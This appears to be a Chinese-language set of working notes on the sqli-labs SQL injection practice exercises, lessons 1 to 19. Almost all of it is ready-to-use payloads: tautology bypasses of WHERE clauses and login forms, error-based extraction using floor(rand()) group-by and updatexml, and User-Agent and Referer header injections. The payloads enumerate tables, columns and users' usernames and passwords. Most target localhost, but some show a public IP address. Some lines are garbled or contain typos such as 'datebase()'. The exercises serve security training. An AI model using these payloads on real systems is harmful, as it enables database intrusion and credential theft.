1:字符:http://localhost/sql/Less-1/index.php?id=2' or '1=1 //2' or '1'='1
2:数字:http://localhost/sql/Less-2/index.php?id=2 or 1=1
爆表名:
(1)http://localhost/sql/Less-2/index.php?id=1+and(select%202%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,table_name,0x7e)%20FROM%20information_schema.tables%20where%20table_schema=database()%20LIMIT%202,1))%20from%20information_schema.tables%20limit%201,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
(2)http://localhost/sql/Less-2/index.php?id=1%20and%20updatexml(1,concat(0x7e,(select%20concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),0x7e),1)--SELECT * FROM users WHERE id=1 and updatexml(1,concat(0x7e,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)-- LIMIT 1,1
爆字段:
(1)http://localhost/sql/Less-2/index.php?id=1+and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,column_name,0x7e)%20FROM%20information_schema.columns%20where%20table_name=0x7573657273%20LIMIT%202,1))%20from%20information_schema.tables%20limit%202,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
(2)http://localhost/sql/Less-2/index.php?id=1%20and%20updatexml(1,concat(0x7e,(SELECT%20distinct%20concat(0x7e,column_name,0x7e)%20FROM%20information_schema.columns%20where%20table_name=0x7573657273%20LIMIT%200,1),0x7e),1)--
SELECT * FROM users WHERE id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x7573657273 LIMIT 0,1),0x7e),1)-- LIMIT 1,1
爆内容:http://localhost/sql/Less-2/index.php?id=1+and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x23,username,0x3a,password,0x23)%20FROM%20users%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
updatexml(爆版本):代码:http://localhost/sql/Less-2/index.php?id=1%20and%20updatexml(1,concat(0x7e,(select%20version()),0x7e),1)--
3:where()'字符:http://localhost/sql/Less-3/index.php?id=2 'or '1=1 //2' or '1'='1
4:where()"字符:http://localhost/sql/Less-4/index.php?id=2" or "1=1
代码:$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
5:where '字符:http://localhost/sql/Less-5/index.php?id=33'or'1=1
代码:$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
6:where "字符:http://localhost/sql/Less-6/index.php?id=33"or "1=1
7:WHERE id=(('$id')) '字符:http://localhost/sql/Less-7/index.php?id=30'or '1=1
mysql的三种注释
1.代码:SELECT username, password FROM users WHERE username='a'or'1'='1'-- '' and password='' LIMIT 0,1
2.代码:SELECT username, password FROM users WHERE username=("")or "1"="1"-- 1") and password=("a") LIMIT 0,1
3:代码:SELECT username, password FROM users WHERE username=('1')or('ab'='a' 'b') and password=('1')or('ab'='a' 'b') LIMIT 0,1
或者:SELECT username, password FROM users WHERE username=('')or '1'='1'-- 1') and password=('a') LIMIT 0
4:代码:SELECT username, password FROM users WHERE username="aa" or"1"="1"-- "" and password="a" LIMIT 0,1
5:代码:SELECT username, password FROM users WHERE username='a'or'1'='1'-- '' and password='a' LIMIT 0,1
6:代码:SELECT username, password FROM users WHERE username=("")or 1=1-- (") and password=("a") LIMIT 0,1
7:admin a' or updatexml(1,concat(0x5e24,version(),0x5e24),1)#18:Your User Agent is: Mozilla/5.0'or updatexml(0,concat(0x2b5e,datebase(),0x2b5e),0),'','')#
9:SELECT users.username, users.password FROM users WHERE users.username='admin' and users.password='admin' ORDER BY users.id DESC LIMIT 0,1INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('http://120.76.137.195/sql/Less-19/'or updatexml(0,concat(0x2b5e,datebase(),0x2b5e),0),'')#', '58.23.96.219')
Your Referer is: http://120.76.137.195/sql/Less-19/'or updatexml(0,concat(0x2b5e,datebase(),0x2b5e),0),'')#
FUNCTION security.datebase does not exist